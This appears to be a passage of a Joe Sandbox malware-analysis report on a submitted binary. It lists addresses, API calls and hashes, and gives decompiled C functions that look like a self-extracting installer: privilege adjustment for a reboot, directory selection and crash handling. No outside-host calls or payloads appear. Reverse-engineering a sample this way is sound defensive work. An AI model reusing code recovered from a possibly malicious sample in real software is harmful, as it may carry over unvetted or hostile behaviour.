                                                                                                                                                                                                    0x00fd5f8f
                                                                                                                                                                                                    0x00fd5fc1
                                                                                                                                                                                                    0x00fd5fc1
                                                                                                                                                                                                    0x00fd5fc1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e74
                                                                                                                                                                                                    0x00fd5e74
                                                                                                                                                                                                    0x00fd5e77
                                                                                                                                                                                                    0x00fd5ea0
                                                                                                                                                                                                    0x00fd5ebd
                                                                                                                                                                                                    0x00fd5f79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5f7f
                                                                                                                                                                                                    0x00fd5ec3
                                                                                                                                                                                                    0x00fd5ec3
                                                                                                                                                                                                    0x00fd5ecc
                                                                                                                                                                                                    0x00fd5ed4
                                                                                                                                                                                                    0x00fd5ed6
                                                                                                                                                                                                    0x00fd5edc
                                                                                                                                                                                                    0x00fd5edf
                                                                                                                                                                                                    0x00fd5eea
                                                                                                                                                                                                    0x00fd5eed
                                                                                                                                                                                                    0x00fd5f3f
                                                                                                                                                                                                    0x00fd5f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5eef
                                                                                                                                                                                                    0x00fd5eef
                                                                                                                                                                                                    0x00fd5ef2
                                                                                                                                                                                                    0x00fd5f34
                                                                                                                                                                                                    0x00fd5ef4
                                                                                                                                                                                                    0x00fd5ef4
                                                                                                                                                                                                    0x00fd5ef7
                                                                                                                                                                                                    0x00fd5f2b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5ef9
                                                                                                                                                                                                    0x00fd5ef9
                                                                                                                                                                                                    0x00fd5efc
                                                                                                                                                                                                    0x00fd5f22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5efe
                                                                                                                                                                                                    0x00fd5eff
                                                                                                                                                                                                    0x00fd5f02
                                                                                                                                                                                                    0x00fd5f16
                                                                                                                                                                                                    0x00fd5f04
                                                                                                                                                                                                    0x00fd5f07
                                                                                                                                                                                                    0x00fd5f0d
                                                                                                                                                                                                    0x00fd5f46
                                                                                                                                                                                                    0x00fd5f46
                                                                                                                                                                                                    0x00fd5f09
                                                                                                                                                                                                    0x00fd5f09
                                                                                                                                                                                                    0x00fd5f09
                                                                                                                                                                                                    0x00fd5f07
                                                                                                                                                                                                    0x00fd5f02
                                                                                                                                                                                                    0x00fd5efc
                                                                                                                                                                                                    0x00fd5ef7
                                                                                                                                                                                                    0x00fd5ef2
                                                                                                                                                                                                    0x00fd5f4c
                                                                                                                                                                                                    0x00fd5f4e
                                                                                                                                                                                                    0x00fd5f50
                                                                                                                                                                                                    0x00fd5f54
                                                                                                                                                                                                    0x00fd5ed4
                                                                                                                                                                                                    0x00fd5ea2
                                                                                                                                                                                                    0x00fd5ea4
                                                                                                                                                                                                    0x00fd5eaf
                                                                                                                                                                                                    0x00fd5eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e79
                                                                                                                                                                                                    0x00fd5e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e83
                                                                                                                                                                                                    0x00fd5e83
                                                                                                                                                                                                    0x00fd5e83
                                                                                                                                                                                                    0x00fd5e85
                                                                                                                                                                                                    0x00fd5e85
                                                                                                                                                                                                    0x00fd5e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e94
                                                                                                                                                                                                    0x00fd5e8e
                                                                                                                                                                                                    0x00fd5e7d
                                                                                                                                                                                                    0x00fd5e77
                                                                                                                                                                                                    0x00fd5e6e
                                                                                                                                                                                                    0x00fd5e65
                                                                                                                                                                                                    0x00fd5e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dce
                                                                                                                                                                                                    0x00fd5dca
                                                                                                                                                                                                    0x00fd5dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d00
                                                                                                                                                                                                    0x00fd5dd9
                                                                                                                                                                                                    0x00fd5e04
                                                                                                                                                                                                    0x00fd61fe
                                                                                                                                                                                                    0x00fd5e0a
                                                                                                                                                                                                    0x00fd5e0c
                                                                                                                                                                                                    0x00fd5e17
                                                                                                                                                                                                    0x00fd5e17
                                                                                                                                                                                                    0x00fd5e04
                                                                                                                                                                                                    0x00fd6200
                                                                                                                                                                                                    0x00fd6200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00FD5CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00FD8B3E,00000104,00000000,?,?), ref: 00FD5DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00FD5E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00FD5EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00FD5F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00FD5FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00FD6008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00FD60AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00FD1140,00000000,00000040,00000000), ref: 00FD61F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00FD61F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 212931d2f9f47649a0a24e5d9f2efa47706868148a06d7d62ae4fe9f4b5ab972
                                                                                                                                                                                                    • Instruction ID: 2ba524ba330a1a180a470d21c1197787746a72a3777aab16757b31cd1aedf46b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212931d2f9f47649a0a24e5d9f2efa47706868148a06d7d62ae4fe9f4b5ab972
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0D17F72E08A495EDF359B388C487B93B63A755B60F1C01A7C486DB391D6748E82BF50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00FD1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0xfd9a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E00FD44B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00FD6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E00FD44B9(0, 0x522, 0xfd1140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00FD1EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00fd1f90
                                                                                                                                                                                                    0x00fd1f90
                                                                                                                                                                                                    0x00fd1f93
                                                                                                                                                                                                    0x00fd1f98
                                                                                                                                                                                                    0x00fd1fa4
                                                                                                                                                                                                    0x00fd1fa7
                                                                                                                                                                                                    0x00fd1fc5
                                                                                                                                                                                                    0x00fd1fcd
                                                                                                                                                                                                    0x00fd1fdb
                                                                                                                                                                                                    0x00fd1ee5
                                                                                                                                                                                                    0x00fd1eea
                                                                                                                                                                                                    0x00fd1ef1
                                                                                                                                                                                                    0x00fd1ef4
                                                                                                                                                                                                    0x00fd1f0c
                                                                                                                                                                                                    0x00fd1f2e
                                                                                                                                                                                                    0x00fd1f3a
                                                                                                                                                                                                    0x00fd1f46
                                                                                                                                                                                                    0x00fd1f4d
                                                                                                                                                                                                    0x00fd1f58
                                                                                                                                                                                                    0x00fd1f60
                                                                                                                                                                                                    0x00fd1f61
                                                                                                                                                                                                    0x00fd1f62
                                                                                                                                                                                                    0x00fd1f75
                                                                                                                                                                                                    0x00fd1f80
                                                                                                                                                                                                    0x00fd1f77
                                                                                                                                                                                                    0x00fd1f77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1f77
                                                                                                                                                                                                    0x00fd1f64
                                                                                                                                                                                                    0x00fd1f64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1f64
                                                                                                                                                                                                    0x00fd1f0e
                                                                                                                                                                                                    0x00fd1f0e
                                                                                                                                                                                                    0x00fd1f13
                                                                                                                                                                                                    0x00fd1f13
                                                                                                                                                                                                    0x00fd1f14
                                                                                                                                                                                                    0x00fd1f14
                                                                                                                                                                                                    0x00fd1f16
                                                                                                                                                                                                    0x00fd1f17
                                                                                                                                                                                                    0x00fd1f1a
                                                                                                                                                                                                    0x00fd1f1f
                                                                                                                                                                                                    0x00fd1f1f
                                                                                                                                                                                                    0x00fd1f86
                                                                                                                                                                                                    0x00fd1f8f
                                                                                                                                                                                                    0x00fd1fcf
                                                                                                                                                                                                    0x00fd1fd3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1fd3
                                                                                                                                                                                                    0x00fd1fa9
                                                                                                                                                                                                    0x00fd1fb4
                                                                                                                                                                                                    0x00fd1fbb
                                                                                                                                                                                                    0x00fd1fc3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1fc3
                                                                                                                                                                                                    0x00fd1f9a
                                                                                                                                                                                                    0x00fd1f9a
                                                                                                                                                                                                    0x00fd1fa2
                                                                                                                                                                                                    0x00fd1fd9
                                                                                                                                                                                                    0x00fd1fda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1fa2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00FD1EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FD1F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00FD1FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: eb2fb379beba198615759bb74cd7f4ff9775f76f2d31d1f1017810babbbbedd6
                                                                                                                                                                                                    • Instruction ID: 11784b64c918c74275dfa32ab53a4c295e0334e048723db86d7bfc38e0d95301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2fb379beba198615759bb74cd7f4ff9775f76f2d31d1f1017810babbbbedd6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D219671A412097BDB205BA1DC4AF7F77BBFB85720F18001BFA05D6281D7758841B665
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00fd6cf7
                                                                                                                                                                                                    0x00fd6d00
                                                                                                                                                                                                    0x00fd6d19

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00FD6E26,?,00FD6E26,00FD1000), ref: 00FD6D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00FD6E26,00FD1000), ref: 00FD6D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6D12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                    • Opcode ID: 19952feffc3a3707b326e854e12890295de13b84a58fd749462a48850c9e69b1
                                                                                                                                                                                                    • Instruction ID: 18e57fdcd18af424ee4351465468428fdb12ca86650fdb64123b89150c40c466
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19952feffc3a3707b326e854e12890295de13b84a58fd749462a48850c9e69b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43D0C93200110CFBDB002BF1EC0CA593F2AEB48216F444002F31982021CA324451AF5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00FD3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E00FD43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0xfd9a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0xfd91e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E00FD44B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0xfd91e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0xfd91e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0xfd91e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0xfd91e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0xfd91e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E00FD658A(0xfd91e4, 0x104, 0xfd1140);
                                                                                                                                                                                                    								_t27 = E00FD58C8(0xfd91e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0xfd91e4 - 0x5c;
                                                                                                                                                                                                    									if( *0xfd91e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E00FD597D(0xfd91e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0xfd91e5 - 0x5c;
                                                                                                                                                                                                    									if( *0xfd91e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E00FD44B9(_t64, 0x54a, 0xfd91e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0xfd91e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0xfd91e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0xfd91e4 - 0x5c;
                                                                                                                                                                                                    						if( *0xfd91e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0xfd9124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0xfd9a3c, 0x3e8, 0xfd8598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00FD4224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0xfd87a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E00FD44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}

























                                                                                                                                                                                                    0x00fd321b
                                                                                                                                                                                                    0x00fd321e
                                                                                                                                                                                                    0x00fd3221
                                                                                                                                                                                                    0x00fd343c
                                                                                                                                                                                                    0x00fd343e
                                                                                                                                                                                                    0x00fd343f
                                                                                                                                                                                                    0x00fd3445
                                                                                                                                                                                                    0x00fd3447
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3447
                                                                                                                                                                                                    0x00fd3229
                                                                                                                                                                                                    0x00fd322a
                                                                                                                                                                                                    0x00fd322f
                                                                                                                                                                                                    0x00fd33ec
                                                                                                                                                                                                    0x00fd33f7
                                                                                                                                                                                                    0x00fd3410
                                                                                                                                                                                                    0x00fd3416
                                                                                                                                                                                                    0x00fd341d
                                                                                                                                                                                                    0x00fd342d
                                                                                                                                                                                                    0x00fd342d
                                                                                                                                                                                                    0x00fd3438
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3438
                                                                                                                                                                                                    0x00fd3237
                                                                                                                                                                                                    0x00fd3243
                                                                                                                                                                                                    0x00fd3243
                                                                                                                                                                                                    0x00fd3246
                                                                                                                                                                                                    0x00fd32ee
                                                                                                                                                                                                    0x00fd32f4
                                                                                                                                                                                                    0x00fd32f6
                                                                                                                                                                                                    0x00fd33d4
                                                                                                                                                                                                    0x00fd33d6
                                                                                                                                                                                                    0x00fd33db
                                                                                                                                                                                                    0x00fd33dc
                                                                                                                                                                                                    0x00fd33de
                                                                                                                                                                                                    0x00fd33df
